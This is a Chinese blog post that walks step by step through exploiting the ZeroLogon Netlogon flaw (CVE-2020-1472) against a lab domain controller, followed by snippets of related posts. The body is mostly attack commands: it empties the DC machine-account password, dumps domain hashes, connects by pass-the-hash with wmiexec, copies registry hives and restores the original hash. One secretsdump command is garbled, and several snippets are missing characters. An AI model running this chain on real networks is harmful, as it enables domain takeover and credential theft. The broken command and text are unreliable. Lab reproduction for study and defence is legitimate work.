CVE-2020-1472 域内提权

已于 2024-01-05 17:51:13 修改
阅读量6.3k 收藏 13
点赞数 1
分类专栏: 内网渗透 文章标签: CVE-2020-1472 域内提权 域控 内网渗透
于 2020-09-16 21:26:35 首次发布
本文为博主原创文章,未经博主允许不得转载。
本文链接:https://blog.csdn.net/lhh134/article/details/108630955
版权

0x1 工具

这里使用zerologon_tester(https://github.com/SecuraBV/CVE-2020-1472)工具验证漏洞是否存在,使用zerologon(https://github.com/risksense/zerologon)工具复现。
运行set_empty_pw.py脚本需要最新版的impacket(https://github.com/SecureAuthCorp/impacket/commit/64ce46580286b5ab15a4737bddf85201ce2adde3)。
注意:不要下载tags里面的,tags里面还是3月份的!

impacket安装:
git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
python3 setup.py install
(如果事先安装了impacket可使用pip3 uninstall impacket命令卸载。)

0x2 漏洞利用

1、漏洞验证POC。

python3 zerologon_tester.py WIN-2008-DC 192.168.3.123

在这里插入图片描述

2、使用zerologon工具将域控密码打成空。(这里打空的用户是域控所在机器的账户,并不是域控账户。)

python3 set_empty_pw DC_NETBIOS_NAME DC_IP_ADDR
python3 set_empty_pw.py WIN-2008-DC 192.168.3.123

在这里插入图片描述

3、使用空密码dump域控上的hash。

secretsdump.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 'ggyao.com/WIN-2008-DC$@192.168.gyao.com/WIN-2008-DC$@192.168.3.123'

在这里插入图片描述

如图:
WIN-2008-DC$用户hash已被替换为31d6cfe0d16ae931b73c59d7e0c089c0 (空)。
在这里插入图片描述

4、使用administrator的hash横向连接过去。

python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24 ggyao/administrator@192.168.3.123

在这里插入图片描述

5、获取计算机账号原始hash。

reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
get system.save
get sam.save
get security.save
del /f system.save
del /f sam.save
del /f security.save

在这里插入图片描述

secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

在这里插入图片描述

6、将该原始计算机帐户哈希还原。

python3 reinstall_original_pw.py DC_NETBIOS_NAME DC_IP_ADDR ORIG_NT_HASH
python3 reinstall_original_pw.py WIN-2008-DC 192.168.3.123 6493fcc57bd126e9ab8fb9f56e8a79c9

在这里插入图片描述

7、查看WIN-2008-DC$账号的hash,已成功还原。

secretsdump.py ggyao.com/administrator:1qaz@WSX@192.168.3.123 -just-dc-user 'WIN-2008-DC$'

在这里插入图片描述

0x3 参考

https://github.com/risksense/zerologon
https://github.com/SecuraBV/CVE-2020-1472

CVE-2020-1472渗透 NetLogon 升漏洞
千寻的博客
06-13 481
模拟环境:获取了一个加入了的计算机限,在system账号限的情况下,将管密码置空,导出管hash,然后进行连接
CVE-2020-1472 域内复现
文公子的博客
12-07 583
CVE-2020-1472 域内复现 *漏洞介绍* 在今年9月份,国外披露了CVE-2020-1472(又被叫做ZeroLogon)的漏洞详情,网上也随即公开了Exp。是近几年windows上比较重量级别的一个漏洞。通过该漏洞,攻击者只需能够访问的445端口,在无需任何凭据的情况下能拿到管的限。该漏洞的产生来源于Netlogon协议认证的加密模块存在缺陷,导致攻击者可以在没有凭证的情况情况下通过认证。该漏洞的最稳定利用是调用netlogon中RPC函数NetrServerPasswordSet2
CVE-2020-1472漏洞复现
blue_fantasy的博客
01-14 2452
Text. 简介 2020年8月11号,微软修复了Netlogon 特升漏洞,2020年9月11日,安全研究员Secura发布了公告,阐明了漏洞细节,之后相关的EXP也就被构造出来。该漏洞也称为“Zerologon”,CVSS评分为10.0,号称3秒撸,危害严重。攻击者在通过NetLogon(MS-NRPC)协议与AD建立安全通道时,可利用该漏洞将AD的计算机账号密码置为空,从而服务器。 原理 详细原理参看:ZeroLogon的利用以及分析 - 安全客,安全资讯平台 本文对
CVE-2020-1472复现与完整利用
热门推荐
Shanfenglan's blog
10-10 14万+
CATALOG漏洞原理利用1.修改文件impacket.dcerpc.v5.nrpc2.置空机器账户yukong$密码3.读取administrator密码4.下载目标的sam文件为下一步恢复机器密码做准备5.破解sam文件查看过去的机器密码6.重制密码yukong$机器密码7.查看密码是否恢复成功 漏洞原理 原理比较复杂,有兴趣的可以看看下面链接上的文章https://www.freebuf.com/articles/system/249860.html 利用 1.修改文件impacket.dcerpc.
内网渗透 --- 利用Zerologon漏洞攻击服务器
最新发布
浩策盾悟
03-26 4933
该漏洞允许攻击者在无需认证的情况下,通过伪造身份与制器(Domain Controller, DC)通信,最终实现对整个 Active Directory(AD)环境的完全制。在内网中,攻击者通常已获得初步立足点(如通过钓鱼邮件或弱密码),Zerologon 漏洞的无需凭据特性使其成为快速的利器。:攻击者通过发送特定的 RPC 调用,将制器的计算机账户密码重置为已知值(通常为空密码),从而制 DC。攻击目标是将制器的计算机账户密码重置为空,并利用空密码接管 DC。
简单的域内
m0_74326506的博客
07-11 2491
42287:微软规定一台机器的机器账号名以$结尾,但又没有做验证,所以一台机器叫dc的话,可以创建有着机器账户属性的dc账户44278:用dc账户向AS申请TGT票据后,然后去向TGS申请ST,在申请ST的时候删除dc这个账户,那么KDC在验证时就查不到dc这个账户,进而查到dc$这个账户,于是就将ST颁给dc¥这个账户。
CVE-2020-1472复现
weixin_44216796的博客
01-01 327
环境搭建 环境:windows server 2019 下一步等待安装完成。 漏洞验证 使用如下命令进行验证: git clone https://github.com/SecuraBV/CVE-2020-1472 cd CVE-2020-1472 python3 -m pip install -r requirements.txt python3 zerologon_tester.py DC_NETBIOS_NAME DC_IP_ADDR 出现下图示证明存在该漏洞: 漏洞利用
域内大杀器CVE-2020-1472复现
茶寂的博客
12-25 5768
前一段时间打ctf第一次接触渗透,其中CVE-2020-1472被称为的大杀器,在本地搭建了个环境复现一下 CVE-2020-1472影响的版本: Windows Server 2008 R2 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) Windows Server 2012 Windows Ser
Ladon插件-CVE-2020-1472漏洞EXP
K8哥哥
09-16 1359
漏洞简述 2020年08月12日, 360CERT监测发现Windows官方 发布了 NetLogon 特升漏洞 的风险通告,该漏洞编号为 CVE-2020-1472,漏洞等级:严重,漏洞评分:10分。 攻击者通过NetLogon(MS-NRPC),建立与间易受攻击的安全通道时,可利用此漏洞获取管访问限。成功利用此漏洞的攻击者可以在该网络中的设备上运行经特殊设计的应用程序。 影响版本 Windows Server 2008 R2 for x64-based Systems Service Pac
CVE-2020-1472 Netlogon特升漏洞分析及复现
include_voidmain的博客
03-03 7263
0x01漏洞背景 NetLogon远程协议是一种在Windows 上使用的RPC 接口,被用于各种与用户和机器认证相关的任务。最常用于让用户使用NTLM协议登录服务器,也用于NTP响应认证以及更新计算机密码。 微软MSRC于8月11日发布了Netlogon 特升漏洞安全通告。此漏洞CVE编号CVE-2020-1472,CVSS评分:10.0。由Secura公司的Tom Tervoort发现交并命名为ZeroLogon。 0x02漏洞分析 Netlogon协议使用的是自定义的加密协议来让客户端(加
CVE-2020-1472漏洞实战 深度剖析
Ms08067安全实验室
11-18 9446
本文作者:Faith(Ms08067实验室 内网安全攻防知识星球)0x00漏洞说明CVE-2020-1472是继MS17010之后一个比较好用的内网漏洞,影响Windows Serv...
CVE-2018-8120--工具
08-28
CVE-2018-8120-- 里面有截图使用方法,好用!
zerologon:零登录漏洞CVE-2020-1472的利用
03-17
ZeroLogon开发脚本 利用基于和代码。 Secura的原始研究和扫描仪,RiskSense Inc.的修改。 要利用该漏洞,请清除您以前安装的所有Impacket,然后从或更高版本安装Impacket。 然后做: python3 set_empty_pw DC_NETBIOS_NAME DC_IP_ADDR 如果成功的话,您将能够: secretsdump.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 'DOMAIN/DC_NETBIOS_NAME$@dc_ip_addr' 这应该使您成为管理员。 完成后,使用来自secretsdump的凭据将wmiexec.py转到目标DC并执行 reg save HKLM\SYSTEM system.save reg save HKLM\SAM sam.save reg save HKLM\SE
CVE-2020-1472域内漏洞复现
whojoe的博客
07-08 950
CVE-2020-1472域内漏洞复现环境漏洞复现mimikatz查看原本hashpoc重置密码获取密码恢复密码查看恢复的密码python重置密码获取管密码1获取机器密码1获取机器密码2恢复密码查看恢复的密码参考文章 环境 ad 192.168.164.129 user 192.168.164.133 kali 192.168.164.x 漏洞复现 mimikatz 查看原本hash mimikatz.exe "privilege::debug" "sekurlsa::logonpassw
CVE-2020-1472-ZeroLogon复现
qq_56426046的博客
11-15 1303
Netlogon使用的AES认证算法中的vi向量默认为0,导致攻击者可以绕过认证,同时其设置密码的远 程接口也使用了该函数,导致可以将中保存在AD中的管理员password设置为空。
CVE-2020-1472 域内利用(
墨痕诉清风的博客
01-25 2416
(Win2008):192.168.199.131 用户(Win7):192.168.199.128 用户(Win03):192.168.199.129 漏洞验证工具:https://github.com/SecuraBV/CVE-2020-1472 利用+重置工具:https://github.com/risksense/zerologon 重置hexpass 工具:https://github.com/dirkjanm/CVE-2020-1472 工具运行环境:https://.
CVE-2020-1472 poc复现
m0_46580995的博客
09-15 508
测试脚本(https://github.com/SecuraBV/CVE-2020-1472) python3 exp NetBIOS名称(名)ip 搭建winsever2016主制器搭建(https://blog.51cto.com/lizmfinder/2127943)
CVE-2020-1472复现过程(不需要输入DC Name)
weixin_39811856的博客
02-10 379
环境搭建 Windows server 2012R2 IP:192.168.146.183 漏洞利用 使用mimikatz进行检测 使用mimikatz进行密码置空 在大部分网上所给出的脚本中,发现DC Name需要手动输入,根据系统命令的调用,发现通过系统命令可得到局网内主机的DC Name Windows: Linux: 检测脚本(仅检测,不具有破坏性)可调用系统命令得到局网内DC Name: 在使用检测脚本时,要求impacket库版本为0.9...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

LQxdp

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值